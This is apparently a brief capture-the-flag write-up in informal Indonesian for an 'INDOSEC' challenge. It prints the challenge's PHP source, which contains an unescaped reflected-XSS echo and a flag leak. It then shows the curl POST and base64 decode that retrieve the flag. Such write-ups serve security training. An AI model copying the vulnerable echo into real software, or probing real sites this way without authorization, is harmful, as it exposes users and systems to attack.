· 7 years ago · Oct 20, 2018, 10:46 AM
1CTF INDOSEC
2
3LINK : https://www.evilb0yz.flu.cc/ctf/
4
5buka link nya, dan apa yang lo liat? form doank kan? coba liat source code nya
6ada parameter GET ?source
7
8dari sana kita bisa lihat isi file index.php, dan ada sesuatu yang bkin saya ngaceng
9
10<?php
11
12 include 'secret.php';
13 function secret($key) {
14 return $key;
15 }
16 if (isset($_POST['kenalan'])) {
17 $nama = $_POST['nama'];
18 echo "<script>alert('Hello ".$nama."');</script>";
19 } elseif (isset($_GET['hello'])) {
20 if (isset($_POST['flag'])) {
21 $a = secret(base64_encode($flag));
22 echo $a;
23 }
24 } elseif (isset($_GET['source'])) {
25 show_source(__FILE__);
26 die();
27 }
28?>
29
30it's pretty simple than former ctf that i'd solved.
31coba lihat baris code berikut
32
33} elseif (isset($_GET['hello'])) {
34 if (isset($_POST['flag'])) {
35 $a = secret(base64_encode($flag));
36 echo $a;
37 }
38
39kita langsung dapet jalur menuju jackpot:D
40Jadi, kalo kita kasih parameter ?hello dan parameter post flag= dengan nilai apa saja
41kita bisa dapet flagnya
42
43command : curl --data "flag=x" "https://www.evilb0yz.flu.cc/ctf/?hello"
44output : DQpmbGFne1dlX0FyZV9JbmRvU2VjfQ0KDQpLaXJpbSBmbGFnIG55YSBrZSBGYW5zcGFnZSBJbmRvU2VjISE= ( base64 )
45
46masih berbentuk base64, tinggal decode dari terminal
47
48solve : echo "DQpmbGFne1dlX0FyZV9JbmRvU2VjfQ0KDQpLaXJpbSBmbGFnIG55YSBrZSBGYW5zcGFnZSBJbmRvU2VjISE=" | base64 --decode
49output : flag{We_Are_IndoSec}